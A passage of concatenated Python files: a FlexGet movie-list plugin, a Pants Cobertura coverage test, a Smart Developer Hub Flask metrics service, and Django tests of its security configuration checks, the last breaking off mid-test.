list_id = Column(Integer, ForeignKey(MovieListList.id), nullable=False)
ids = relationship('MovieListID', backref='movie', cascade='all, delete, delete-orphan')
def __repr__(self):
return '<MovieListMovie title=%s,year=%s,list_id=%d>' % (self.title, self.year, self.list_id)
def to_entry(self, strip_year=False):
entry = Entry()
entry['title'] = entry['movie_name'] = self.title
entry['url'] = 'mock://localhost/movie_list/%d' % self.id
entry['added'] = self.added
if self.year:
if strip_year is False:
entry['title'] += ' (%d)' % self.year
entry['movie_year'] = self.year
for movie_list_id in self.ids:
entry[movie_list_id.id_name] = movie_list_id.id_value
return entry
def to_dict(self):
return {
'id': self.id,
'added_on': self.added,
'title': self.title,
'year': self.year,
'list_id': self.list_id,
'movies_list_ids': [movie_list_id.to_dict() for movie_list_id in self.ids]
}
@property
def identifiers(self):
""" Return a dict of movie identifiers """
return {identifier.id_name: identifier.id_value for identifier in self.ids}
class MovieListID(Base):
__tablename__ = 'movie_list_ids'
id = Column(Integer, primary_key=True)
added = Column(DateTime, default=datetime.now)
id_name = Column(Unicode)
id_value = Column(Unicode)
movie_id = Column(Integer, ForeignKey(MovieListMovie.id))
def __repr__(self):
return '<MovieListID id_name=%s,id_value=%s,movie_id=%d>' % (self.id_name, self.id_value, self.movie_id)
def to_dict(self):
return {
'id': self.id,
'added_on': self.added,
'id_name': self.id_name,
'id_value': self.id_value,
'movie_id': self.movie_id
}
class MovieList(MutableSet):
def _db_list(self, session):
return session.query(MovieListList).filter(MovieListList.name == self.list_name).first()
def _from_iterable(self, it):
# TODO: is this the right answer? the returned object won't have our custom __contains__ logic
return set(it)
@with_session
def __init__(self, config, session=None):
if not isinstance(config, dict):
config = {'list_name': config}
config.setdefault('strip_year', False)
self.list_name = config.get('list_name')
self.strip_year = config.get('strip_year')
db_list = self._db_list(session)
if not db_list:
session.add(MovieListList(name=self.list_name))
def __iter__(self):
with Session() as session:
return iter([movie.to_entry(self.strip_year) for movie in self._db_list(session).movies])
def __len__(self):
with Session() as session:
return len(self._db_list(session).movies)
def add(self, entry):
with Session() as session:
# Check if this is already in the list, refresh info if so
db_list = self._db_list(session=session)
db_movie = self._find_entry(entry, session=session)
# Just delete and re-create to refresh
if db_movie:
session.delete(db_movie)
db_movie = MovieListMovie()
if 'movie_name' in entry:
db_movie.title, db_movie.year = entry['movie_name'], entry.get('movie_year')
else:
db_movie.title, db_movie.year = split_title_year(entry['title'])
for id_name in MovieListBase().supported_ids:
if id_name in entry:
db_movie.ids.append(MovieListID(id_name=id_name, id_value=entry[id_name]))
log.debug('adding entry %s', entry)
db_list.movies.append(db_movie)
session.commit()
return db_movie.to_entry()
def discard(self, entry):
with Session() as session:
db_movie = self._find_entry(entry, session=session)
if db_movie:
log.debug('deleting movie %s', db_movie)
session.delete(db_movie)
def __contains__(self, entry):
return self._find_entry(entry) is not None
@with_session
def _find_entry(self, entry, session=None):
"""Finds `MovieListMovie` corresponding to this entry, if it exists."""
# Match by supported IDs
for id_name in MovieListBase().supported_ids:
if entry.get(id_name):
log.debug('trying to match movie based on id %s: %s', id_name, entry[id_name])
res = (self._db_list(session).movies.join(MovieListMovie.ids).filter(
and_(
MovieListID.id_name == id_name,
MovieListID.id_value == entry[id_name]))
.first())
if res:
log.debug('found movie %s', res)
return res
# Fall back to title/year match
if not entry.get('movie_name'):
self._parse_title(entry)
if entry.get('movie_name'):
name = entry['movie_name']
year = entry.get('movie_year') if entry.get('movie_year') else None
else:
log.warning('Could not get a movie name, skipping')
return
log.debug('trying to match movie based on name: %s and year: %s', name, year)
res = (self._db_list(session).movies.filter(func.lower(MovieListMovie.title) == name.lower())
.filter(MovieListMovie.year == year).first())
if res:
log.debug('found movie %s', res)
return res
@staticmethod
def _parse_title(entry):
parser = get_plugin_by_name('parsing').instance.parse_movie(data=entry['title'])
if parser and parser.valid:
parser.name = normalize_name(remove_dirt(parser.name))
entry.update(parser.fields)
@property
def immutable(self):
return False
@property
def online(self):
"""
Set the online status of the plugin, online plugin should be treated
differently in certain situations, like test mode
"""
return False
@with_session
def get(self, entry, session):
match = self._find_entry(entry=entry, session=session)
return match.to_entry() if match else None
class PluginMovieList(object):
"""Remove all accepted elements from your trakt.tv watchlist/library/seen or custom list."""
schema = {'oneOf': [
{'type': 'string'},
{'type': 'object',
'properties': {
'list_name': {'type': 'string'},
'strip_year': {'type': 'boolean'}
},
'required': ['list_name'],
'additionalProperties': False
}
]}
@staticmethod
def get_list(config):
return MovieList(config)
def on_task_input(self, task, config):
return list(MovieList(config))
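# Illustrative only: a hypothetical FlexGet task configuration exercising both
# schema forms accepted above (task and list names are assumptions, not part
# of this module):
#
#   tasks:
#     fill-movie-list:
#       movie_list: my_movies          # plain string form
#     read-movie-list:
#       movie_list:                    # object form
#         list_name: my_movies
#         strip_year: yes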
@event('plugin.register')
def register_plugin():
plugin.register(PluginMovieList, 'movie_list', api_ver=2, groups=['list'])
@with_session
def get_movies_by_list_id(list_id, start=None, stop=None, order_by='added', descending=False,
session=None):
query = session.query(MovieListMovie).filter(MovieListMovie.list_id == list_id)
if descending:
query = query.order_by(getattr(MovieListMovie, order_by).desc())
else:
query = query.order_by(getattr(MovieListMovie, order_by))
return query.slice(start, stop).all()
@with_session
def get_movie_lists(name=None, session=None):
log.debug('retrieving movie lists')
query = session.query(MovieListList)
if name:
log.debug('filtering by name %s', name)
query = query.filter(MovieListList.name.contains(name))
return query.all()
@with_session
def get_list_by_exact_name(name, session=None):
log.debug('returning list with name %s', name)
return session.query(MovieListList).filter(func.lower(MovieListList.name) == name.lower()).one()
@with_session
def get_list_by_id(list_id, session=None):
log.debug('fetching list with id %d', list_id)
return session.query(MovieListList).filter(MovieListList.id == list_id).one()
@with_session
def get_movie_by_id(list_id, movie_id, session=None):
log.debug('fetching movie with id %d from list id %d', movie_id, list_id)
return session.query(MovieListMovie).filter(
and_(MovieListMovie.id == movie_id, MovieListMovie.list_id == list_id)).one()
@with_session
def get_movie_by_title_and_year(list_id, title, year=None, session=None):
movie_list = get_list_by_id(list_id=list_id, session=session)
if movie_list:
log.debug('searching for movie %s in list %d', title, list_id)
return session.query(MovieListMovie).filter(
and_(
func.lower(MovieListMovie.title) == title.lower(),
MovieListMovie.year == year,
MovieListMovie.list_id == list_id)
).one_or_none()
@with_session
def get_movie_identifier(identifier_name, identifier_value, movie_id=None, session=None):
db_movie_id = session.query(MovieListID).filter(
and_(MovieListID.id_name == identifier_name,
MovieListID.id_value == identifier_value,
MovieListID.movie_id == movie_id)).first()
if db_movie_id:
log.debug('fetching movie identifier %s: %s', db_movie_id.id_name, db_movie_id.id_value)
return db_movie_id
@with_session
def get_db_movie_identifiers(identifier_list, movie_id=None, session=None):
db_movie_ids = []
for identifier in identifier_list:
for key, value in identifier.items():
if key in MovieListBase().supported_ids:
db_movie_id = get_movie_identifier(identifier_name=key, identifier_value=value, movie_id=movie_id,
session=session)
if not db_movie_id:
log.debug('creating movie identifier %s: %s', key, value)
db_movie_id = MovieListID(id_name=key, id_value=value, movie_id=movie_id)
session.merge(db_movie_id)
db_movie_ids.append(db_movie_id)
return db_movie_ids
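# Illustrative only: a minimal sketch of how the session-aware helpers above
# could be combined (assumes a list named 'my_movies' already exists):
#
#   with Session() as session:
#       movie_list = get_list_by_exact_name('my_movies', session=session)
#       movies = get_movies_by_list_id(movie_list.id, order_by='title',
#                                      session=session)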
|
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from collections import defaultdict
from pants.backend.jvm.targets.annotation_processor import AnnotationProcessor
from pants.backend.jvm.targets.jar_library import JarLibrary
from pants.backend.jvm.targets.java_library import JavaLibrary
from pants.backend.jvm.targets.jvm_app import JvmApp
from pants.backend.jvm.targets.jvm_binary import JvmBinary
from pants.backend.jvm.tasks.classpath_products import ClasspathProducts
from pants.backend.jvm.tasks.coverage.cobertura import Cobertura
from pants.backend.jvm.tasks.coverage.manager import CodeCoverageSettings
from pants.java.jar.jar_dependency import JarDependency
from pants_test.base_test import BaseTest
class attrdict(dict):
"""Allows entries in the dictionary to be accessed like a property, in order to spoof options.
:API: public
"""
def __getattr__(self, key):
return self.get(key)
class fake_log(object):
"""
:API: public
"""
def debug(self, string):
"""
:API: public
"""
pass
def warn(self, string):
"""
:API: public
"""
pass
class MockSystemCalls(object):
"""
:API: public
"""
def __init__(self):
self.copy2_calls = defaultdict(list)
self.copytree_calls = defaultdict(list)
self.safe_makedir_calls = []
def safe_md(self, dir, clean):
"""
:API: public
"""
assert clean is True
self.safe_makedir_calls.append(dir)
class TestCobertura(BaseTest):
"""
:API: public
"""
def get_settings(self, options, workdir, log, syscalls):
return CodeCoverageSettings(
options,
None,
self.pants_workdir,
None,
None,
fake_log(),
copy2=lambda frm, to: syscalls.copy2_calls[frm].append(to),
copytree=lambda frm, to: syscalls.copytree_calls[frm].append(to),
is_file=lambda file_name: file_name.endswith('.jar'),
safe_md=syscalls.safe_md)
def setUp(self):
"""
:API: public
"""
super(TestCobertura, self).setUp()
self.pants_workdir = 'workdir'
self.conf = 'default'
self.factory = Cobertura.Factory("test_scope", [])
self.jar_lib = self.make_target(spec='3rdparty/jvm/org/example:foo',
target_type=JarLibrary,
jars=[JarDependency(org='org.example', name='foo', rev='1.0.0'),
JarDependency(org='org.pantsbuild', name='bar',
rev='2.0.0', ext='zip')])
self.binary_target = self.make_target(spec='//foo:foo-binary',
target_type=JvmBinary,
source='Foo.java',
dependencies=[self.jar_lib])
self.app_target = self.make_target(spec='//foo:foo-app',
target_type=JvmApp,
basename='FooApp',
dependencies=[self.binary_target])
self.java_target = self.make_target(spec='//foo:foo-java',
target_type=JavaLibrary,
sources=[])
self.annotation_target = self.make_target(spec='//foo:foo-anno',
target_type=AnnotationProcessor)
def _add_for_target(self, products, target, path):
products.add_for_target(target, [(self.conf, self.pants_workdir + path)])
def _assert_calls(self, call_collection, frm, to):
calls_for_target = call_collection[self.pants_workdir + frm]
self.assertEquals(len(calls_for_target), 1, "Should be 1 call for the target's path.")
self.assertEquals(calls_for_target[0], self.pants_workdir + to,
'Should copy from/to correct paths.')
def _assert_target_copy(self, coverage, frm, to):
self._assert_calls(coverage.copy2_calls, frm, to)
def _assert_target_copytree(self, coverage, frm, to):
self._assert_calls(coverage.copytree_calls, frm, to)
def test_skips_non_coverage_targets(self):
"""
:API: public
"""
options = attrdict(coverage=True, coverage_jvm_options=[])
syscalls = MockSystemCalls()
settings = self.get_settings(options, self.pants_workdir, fake_log(), syscalls)
classpath_products = ClasspathProducts(self.pants_workdir)
self._add_for_target(classpath_products, self.jar_lib, '/jar/lib/classpath')
self._add_for_target(classpath_products, self.binary_target, '/binary/target/classpath')
self._add_for_target(classpath_products, self.app_target, '/app/target/classpath')
self._add_for_target(classpath_products, self.java_target, '/java/target/classpath.jar')
Cobertura.initialize_instrument_classpath(
settings,
[self.jar_lib, self.binary_target, self.app_target, self.java_target],
classpath_products)
self.assertEquals(len(syscalls.copy2_calls), 1,
'Should only be 1 call for the single java_library target.')
self._assert_target_copy(syscalls, '/java/target/classpath.jar',
'/coverage/classes/foo.foo-java/0')
self.assertEquals(len(syscalls.copytree_calls), 0,
'Should be no copytree calls when targets are not coverage targets.')
def test_target_with_multiple_path_entries(self):
"""
:API: public
"""
options = attrdict(coverage=True, coverage_jvm_options=[])
syscalls = MockSystemCalls()
settings = self.get_settings(options, self.pants_workdir, fake_log(), syscalls)
classpath_products = ClasspathProducts(self.pants_workdir)
self._add_for_target(classpath_products, self.java_target, '/java/target/first.jar')
self._add_for_target(classpath_products, self.java_target, '/java/target/second.jar')
self._add_for_target(classpath_products, self.java_target, '/java/target/third.jar')
Cobertura.initialize_instrument_classpath(settings, [self.java_target], classpath_products)
self.assertEquals(len(syscalls.copy2_calls), 3,
'Should be 3 calls for the single java_library target.')
self._assert_target_copy(syscalls, '/java/target/first.jar', '/coverage/classes/foo.foo-java/0')
self._assert_target_copy(syscalls, '/java/target/second.jar',
'/coverage/classes/foo.foo-java/1')
self._assert_target_copy(syscalls, '/java/target/third.jar',
'/coverage/classes/foo.foo-java/2')
self.assertEquals(len(syscalls.copytree_calls), 0,
'Should be no copytree calls when targets are not coverage targets.')
def test_target_annotation_processor(self):
"""
:API: public
"""
options = attrdict(coverage=True, coverage_jvm_options=[])
syscalls = MockSystemCalls()
settings = self.get_settings(options, self.pants_workdir, fake_log(), syscalls)
classpath_products = ClasspathProducts(self.pants_workdir)
self._add_for_target(classpath_products, self.annotation_target, '/anno/target/dir')
Cobertura.initialize_instrument_classpath(settings, [self.annotation_target], classpath_products)
self.assertEquals(len(syscalls.copy2_calls), 0,
'Should be 0 calls for the single annotation target.')
self._assert_target_copytree(syscalls, '/anno/target/dir', '/coverage/classes/foo.foo-anno/0')
def _get_fake_execute_java(self):
def _fake_execute_java(classpath, main, jvm_options, args, workunit_factory, workunit_name):
# At some point we could add assertions here for expected parameter values
pass
return _fake_execute_java
def test_coverage_forced(self):
"""
:API: public
"""
options = attrdict(coverage=True, coverage_force=True, coverage_jvm_options=[])
syscalls = MockSystemCalls()
settings = self.get_settings(options, self.pants_workdir, fake_log(), syscalls)
cobertura = self.factory.create(settings, [self.binary_target], self._get_fake_execute_java())
self.assertEquals(cobertura.should_report(), False, 'Without instrumentation step, there should be nothing to instrument or report')
# simulate an instrument step with results
cobertura._nothing_to_instrument = False
self.assertEquals(cobertura.should_report(), True, 'Should do reporting when there is something to instrument')
exception = Exception("uh oh, test failed")
self.assertEquals(cobertura.should_report(exception), True, 'We\'ve forced coverage, so should report.')
no_force_options = attrdict(coverage=True, coverage_force=False, coverage_jvm_options=[])
no_force_settings = self.get_settings(no_force_options, self.pants_workdir, fake_log(), syscalls)
no_force_cobertura = self.factory.create(no_force_settings, [self.binary_target], self._get_fake_execute_java())
no_force_cobertura._nothing_to_instrument = False
self.assertEquals(no_force_cobertura.should_report(exception), False, 'Don\'t report after a failure if coverage isn\'t forced.')
|
|
"""
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
This file is part of the Smart Developer Hub Project:
http://www.smartdeveloperhub.org
Center for Open Middleware
http://www.centeropenmiddleware.com/
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Copyright (C) 2015 Center for Open Middleware.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
"""
__author__ = 'Fernando Serena'
from agora.provider.server.base import AgoraApp, get_accept
import calendar
from datetime import datetime
from agora.provider.server.base import APIError, NotFound
from flask import make_response, url_for
from flask_negotiate import produces
from rdflib.namespace import Namespace, RDF
from rdflib import Graph, URIRef, Literal
from functools import wraps
from sdh.metrics.jobs.calculus import check_triggers
import pkg_resources
try:
pkg_resources.declare_namespace(__name__)
except ImportError:
import pkgutil
__path__ = pkgutil.extend_path(__path__, __name__)
METRICS = Namespace('http://www.smartdeveloperhub.org/vocabulary/metrics#')
PLATFORM = Namespace('http://www.smartdeveloperhub.org/vocabulary/platform#')
class MetricsGraph(Graph):
def __init__(self):
super(MetricsGraph, self).__init__()
self.bind('metrics', METRICS)
self.bind('platform', PLATFORM)
@staticmethod
def __decide_serialization_format():
mimes = get_accept()
if 'text/turtle' in mimes:
return 'text/turtle', 'turtle'
elif 'text/rdf+n3' in mimes:
return 'text/rdf+n3', 'n3'
else:
return 'application/xml', 'xml'
def serialize(self, destination=None, format="xml",
base=None, encoding=None, **args):
content_type, ex_format = self.__decide_serialization_format()
return content_type, super(MetricsGraph, self).serialize(destination=destination, format=ex_format,
base=base, encoding=encoding, **args)
class MetricsApp(AgoraApp):
@staticmethod
def __get_metric_definition_graph(md):
g = MetricsGraph()
me = URIRef(url_for('__get_definition', md=md, _external=True))
g.add((me, RDF.type, METRICS.MetricDefinition))
g.add((me, PLATFORM.identifier, Literal(md)))
return g
@staticmethod
def __return_graph(g):
content_type, rdf = g.serialize()
response = make_response(rdf)
response.headers['Content-Type'] = content_type
return response
@produces('text/turtle', 'text/rdf+n3', 'application/rdf+xml', 'application/xml')
def __get_definition(self, md):
if md not in self.metrics.values():
raise NotFound('Unknown metric definition')
g = self.__get_metric_definition_graph(md)
return self.__return_graph(g)
@produces('text/turtle', 'text/rdf+n3', 'application/rdf+xml', 'application/xml')
def __root(self):
g = MetricsGraph()
me = URIRef(url_for('__root', _external=True))
g.add((me, RDF.type, METRICS.MetricService))
for mf in self.metrics.keys():
endp = URIRef(url_for(mf, _external=True))
g.add((me, METRICS.hasEndpoint, endp))
mident = self.metrics[mf]
md = URIRef(url_for('__get_definition', md=mident, _external=True))
g.add((me, METRICS.calculatesMetric, md))
g.add((md, RDF.type, METRICS.MetricDefinition))
g.add((md, PLATFORM.identifier, Literal(mident)))
return self.__return_graph(g)
def __init__(self, name, config_class):
super(MetricsApp, self).__init__(name, config_class)
self.metrics = {}
self.route('/metrics')(self.__root)
self.route('/metrics/definitions/<md>')(self.__get_definition)
self.store = None
def __metric_rdfizer(self, func):
g = Graph()
g.bind('metrics', METRICS)
g.bind('platform', PLATFORM)
me = URIRef(url_for(func, _external=True))
g.add((me, RDF.type, METRICS.MetricEndpoint))
g.add((me, METRICS.supports, URIRef(url_for('__get_definition', md=self.metrics[func], _external=True))))
return g
def __add_context(self, f):
@wraps(f)
def wrapper(*args, **kwargs):
data = f(*args, **kwargs)
context = kwargs
context['timestamp'] = calendar.timegm(datetime.utcnow().timetuple())
if isinstance(data, tuple):
context.update(data[0])
data = data[1]
if type(data) == list:
context['size'] = len(data)
return context, data
return wrapper
def metric(self, path, handler, mid):
def decorator(f):
f = self.__add_context(f)
f = self.register('/metrics' + path, handler, self.__metric_rdfizer)(f)
self.metrics[f.func_name] = mid
return f
return decorator
def calculus(self, triggers=None):
def decorator(f):
from sdh.metrics.jobs.calculus import add_calculus
add_calculus(f, triggers)
return f
return decorator
@staticmethod
def _get_repo_context(request):
rid = request.args.get('rid', None)
if rid is None:
raise APIError('A repository ID is required')
return rid
@staticmethod
def _get_user_context(request):
uid = request.args.get('uid', None)
if uid is None:
raise APIError('A user ID is required')
return uid
@staticmethod
def _get_basic_context(request):
begin = request.args.get('begin', None)
if begin is not None:
begin = int(begin)
end = request.args.get('end', None)
if end is not None:
end = int(end)
if begin is not None and end is not None:
if end < begin:
raise APIError('Begin cannot be higher than end')
return {'begin': begin, 'end': end}
@staticmethod
def _get_tbd_context(request):
begin = int(request.args.get('begin', 0))
end = int(request.args.get('end', calendar.timegm(datetime.utcnow().timetuple())))
if end < begin:
raise APIError('Begin cannot be higher than end')
return {'begin': begin, 'end': end}
def _get_metric_context(self, request):
_max = request.args.get('max', 1)
context = self._get_basic_context(request)
context['max'] = max(0, int(_max))
if context['begin'] is not None and context['end'] is not None:
context['step'] = context['end'] - context['begin']
else:
context['step'] = None
if context['max'] and context['step'] is not None:
context['step'] /= context['max']
if not context['step']:
raise APIError('Resulting step is 0')
return context
def orgmetric(self, path, aggr, mid):
def context(request):
return [], self._get_metric_context(request)
return lambda f: self.metric(path, context, '{}-org-{}'.format(aggr, mid))(f)
def repometric(self, path, aggr, mid):
def context(request):
return [self._get_repo_context(request)], self._get_metric_context(request)
return lambda f: self.metric(path, context, '{}-repo-{}'.format(aggr, mid))(f)
def usermetric(self, path, aggr, mid):
def context(request):
return [self._get_user_context(request)], self._get_metric_context(request)
return lambda f: self.metric(path, context, '{}-user-{}'.format(aggr, mid))(f)
def repousermetric(self, path, aggr, mid):
def context(request):
return [self._get_repo_context(request), self._get_user_context(request)], self._get_metric_context(request)
return lambda f: self.metric(path, context, '{}-repo-user-{}'.format(aggr, mid))(f)
def orgtbd(self, path, mid):
def context(request):
return [], self._get_tbd_context(request)
return lambda f: self.metric(path, context, 'tbd-org-' + mid)(f)
def repotbd(self, path, mid):
def context(request):
return [self._get_repo_context(request)], self._get_tbd_context(request)
return lambda f: self.metric(path, context, 'tbd-repo-' + mid)(f)
def usertbd(self, path, mid):
def context(request):
return [self._get_user_context(request)], self._get_tbd_context(request)
return lambda f: self.metric(path, context, 'tbd-user-' + mid)(f)
def userrepotbd(self, path, mid):
def context(request):
return [self._get_repo_context(request), self._get_user_context(request)], self._get_tbd_context(request)
return lambda f: self.metric(path, context, 'tbd-repo-user-' + mid)(f)
def calculate(self, collector, quad, stop_event):
self.store.execute_pending()
check_triggers(collector, quad, stop_event)
self.store.execute_pending()
def run(self, host=None, port=None, debug=None, **options):
tasks = options.get('tasks', [])
tasks.append(self.calculate)
options['tasks'] = tasks
super(MetricsApp, self).run(host, port, debug, **options)
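# A minimal, hypothetical usage sketch. The names below are illustrative
# assumptions; the exact arguments passed to the decorated function depend on
# AgoraApp's request dispatching, which is not shown here:
#
#   app = MetricsApp('metrics-example', SomeConfigClass)
#
#   @app.orgmetric('/total-commits', 'sum', 'commits')
#   def total_commits(**kwargs):
#       return [42]
#
#   app.run(host='0.0.0.0', port=5000)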
|
|
from django.conf import settings
from django.core.checks.security import base, csrf, sessions
from django.test import SimpleTestCase
from django.test.utils import override_settings
class CheckSessionCookieSecureTest(SimpleTestCase):
@override_settings(
SESSION_COOKIE_SECURE=False,
INSTALLED_APPS=["django.contrib.sessions"],
MIDDLEWARE=[],
)
def test_session_cookie_secure_with_installed_app(self):
"""
Warn if SESSION_COOKIE_SECURE is off and "django.contrib.sessions" is
in INSTALLED_APPS.
"""
self.assertEqual(sessions.check_session_cookie_secure(None), [sessions.W010])
@override_settings(
SESSION_COOKIE_SECURE=False,
INSTALLED_APPS=[],
MIDDLEWARE=['django.contrib.sessions.middleware.SessionMiddleware'],
)
def test_session_cookie_secure_with_middleware(self):
"""
Warn if SESSION_COOKIE_SECURE is off and
"django.contrib.sessions.middleware.SessionMiddleware" is in
MIDDLEWARE.
"""
self.assertEqual(sessions.check_session_cookie_secure(None), [sessions.W011])
@override_settings(
SESSION_COOKIE_SECURE=False,
INSTALLED_APPS=["django.contrib.sessions"],
MIDDLEWARE=['django.contrib.sessions.middleware.SessionMiddleware'],
)
def test_session_cookie_secure_both(self):
"""
If SESSION_COOKIE_SECURE is off and we find both the session app and
the middleware, provide one common warning.
"""
self.assertEqual(sessions.check_session_cookie_secure(None), [sessions.W012])
@override_settings(
SESSION_COOKIE_SECURE=True,
INSTALLED_APPS=["django.contrib.sessions"],
MIDDLEWARE=['django.contrib.sessions.middleware.SessionMiddleware'],
)
def test_session_cookie_secure_true(self):
"""
If SESSION_COOKIE_SECURE is on, there's no warning about it.
"""
self.assertEqual(sessions.check_session_cookie_secure(None), [])
class CheckSessionCookieHttpOnlyTest(SimpleTestCase):
@override_settings(
SESSION_COOKIE_HTTPONLY=False,
INSTALLED_APPS=["django.contrib.sessions"],
MIDDLEWARE=[],
)
def test_session_cookie_httponly_with_installed_app(self):
"""
Warn if SESSION_COOKIE_HTTPONLY is off and "django.contrib.sessions"
is in INSTALLED_APPS.
"""
self.assertEqual(sessions.check_session_cookie_httponly(None), [sessions.W013])
@override_settings(
SESSION_COOKIE_HTTPONLY=False,
INSTALLED_APPS=[],
MIDDLEWARE=['django.contrib.sessions.middleware.SessionMiddleware'],
)
def test_session_cookie_httponly_with_middleware(self):
"""
Warn if SESSION_COOKIE_HTTPONLY is off and
"django.contrib.sessions.middleware.SessionMiddleware" is in
MIDDLEWARE.
"""
self.assertEqual(sessions.check_session_cookie_httponly(None), [sessions.W014])
@override_settings(
SESSION_COOKIE_HTTPONLY=False,
INSTALLED_APPS=["django.contrib.sessions"],
MIDDLEWARE=['django.contrib.sessions.middleware.SessionMiddleware'],
)
def test_session_cookie_httponly_both(self):
"""
If SESSION_COOKIE_HTTPONLY is off and we find both the session app and
the middleware, provide one common warning.
"""
self.assertEqual(sessions.check_session_cookie_httponly(None), [sessions.W015])
@override_settings(
SESSION_COOKIE_HTTPONLY=True,
INSTALLED_APPS=["django.contrib.sessions"],
MIDDLEWARE=['django.contrib.sessions.middleware.SessionMiddleware'],
)
def test_session_cookie_httponly_true(self):
"""
If SESSION_COOKIE_HTTPONLY is on, there's no warning about it.
"""
self.assertEqual(sessions.check_session_cookie_httponly(None), [])
class CheckCSRFMiddlewareTest(SimpleTestCase):
@override_settings(MIDDLEWARE=[])
def test_no_csrf_middleware(self):
"""
Warn if CsrfViewMiddleware isn't in MIDDLEWARE.
"""
self.assertEqual(csrf.check_csrf_middleware(None), [csrf.W003])
@override_settings(MIDDLEWARE=['django.middleware.csrf.CsrfViewMiddleware'])
def test_with_csrf_middleware(self):
self.assertEqual(csrf.check_csrf_middleware(None), [])
class CheckCSRFCookieSecureTest(SimpleTestCase):
@override_settings(
MIDDLEWARE=["django.middleware.csrf.CsrfViewMiddleware"],
CSRF_COOKIE_SECURE=False,
)
def test_with_csrf_cookie_secure_false(self):
"""
Warn if CsrfViewMiddleware is in MIDDLEWARE but
CSRF_COOKIE_SECURE isn't True.
"""
self.assertEqual(csrf.check_csrf_cookie_secure(None), [csrf.W016])
@override_settings(
MIDDLEWARE=["django.middleware.csrf.CsrfViewMiddleware"],
CSRF_USE_SESSIONS=True,
CSRF_COOKIE_SECURE=False,
)
def test_use_sessions_with_csrf_cookie_secure_false(self):
"""
No warning if CSRF_COOKIE_SECURE isn't True while CSRF_USE_SESSIONS
is True.
"""
self.assertEqual(csrf.check_csrf_cookie_secure(None), [])
@override_settings(MIDDLEWARE=[], CSRF_COOKIE_SECURE=False)
def test_with_csrf_cookie_secure_false_no_middleware(self):
"""
No warning if CsrfViewMiddleware isn't in MIDDLEWARE, even if
CSRF_COOKIE_SECURE is False.
"""
self.assertEqual(csrf.check_csrf_cookie_secure(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.csrf.CsrfViewMiddleware"],
CSRF_COOKIE_SECURE=True,
)
def test_with_csrf_cookie_secure_true(self):
self.assertEqual(csrf.check_csrf_cookie_secure(None), [])
class CheckSecurityMiddlewareTest(SimpleTestCase):
@override_settings(MIDDLEWARE=[])
def test_no_security_middleware(self):
"""
Warn if SecurityMiddleware isn't in MIDDLEWARE.
"""
self.assertEqual(base.check_security_middleware(None), [base.W001])
@override_settings(MIDDLEWARE=['django.middleware.security.SecurityMiddleware'])
def test_with_security_middleware(self):
self.assertEqual(base.check_security_middleware(None), [])
class CheckStrictTransportSecurityTest(SimpleTestCase):
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_HSTS_SECONDS=0,
)
def test_no_sts(self):
"""
Warn if SECURE_HSTS_SECONDS isn't > 0.
"""
self.assertEqual(base.check_sts(None), [base.W004])
@override_settings(MIDDLEWARE=[], SECURE_HSTS_SECONDS=0)
def test_no_sts_no_middleware(self):
"""
Don't warn if SECURE_HSTS_SECONDS isn't > 0 and SecurityMiddleware isn't
installed.
"""
self.assertEqual(base.check_sts(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_HSTS_SECONDS=3600,
)
def test_with_sts(self):
self.assertEqual(base.check_sts(None), [])
class CheckStrictTransportSecuritySubdomainsTest(SimpleTestCase):
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_HSTS_INCLUDE_SUBDOMAINS=False,
SECURE_HSTS_SECONDS=3600,
)
def test_no_sts_subdomains(self):
"""
Warn if SECURE_HSTS_INCLUDE_SUBDOMAINS isn't True.
"""
self.assertEqual(base.check_sts_include_subdomains(None), [base.W005])
@override_settings(
MIDDLEWARE=[],
SECURE_HSTS_INCLUDE_SUBDOMAINS=False,
SECURE_HSTS_SECONDS=3600,
)
def test_no_sts_subdomains_no_middleware(self):
"""
Don't warn if SecurityMiddleware isn't installed.
"""
self.assertEqual(base.check_sts_include_subdomains(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_SSL_REDIRECT=False,
SECURE_HSTS_SECONDS=None,
)
def test_no_sts_subdomains_no_seconds(self):
"""
Don't warn if SECURE_HSTS_SECONDS isn't set.
"""
self.assertEqual(base.check_sts_include_subdomains(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_HSTS_INCLUDE_SUBDOMAINS=True,
SECURE_HSTS_SECONDS=3600,
)
def test_with_sts_subdomains(self):
self.assertEqual(base.check_sts_include_subdomains(None), [])
class CheckStrictTransportSecurityPreloadTest(SimpleTestCase):
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_HSTS_PRELOAD=False,
SECURE_HSTS_SECONDS=3600,
)
def test_no_sts_preload(self):
"""
Warn if SECURE_HSTS_PRELOAD isn't True.
"""
self.assertEqual(base.check_sts_preload(None), [base.W021])
@override_settings(MIDDLEWARE=[], SECURE_HSTS_PRELOAD=False, SECURE_HSTS_SECONDS=3600)
def test_no_sts_preload_no_middleware(self):
"""
Don't warn if SecurityMiddleware isn't installed.
"""
self.assertEqual(base.check_sts_preload(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_SSL_REDIRECT=False,
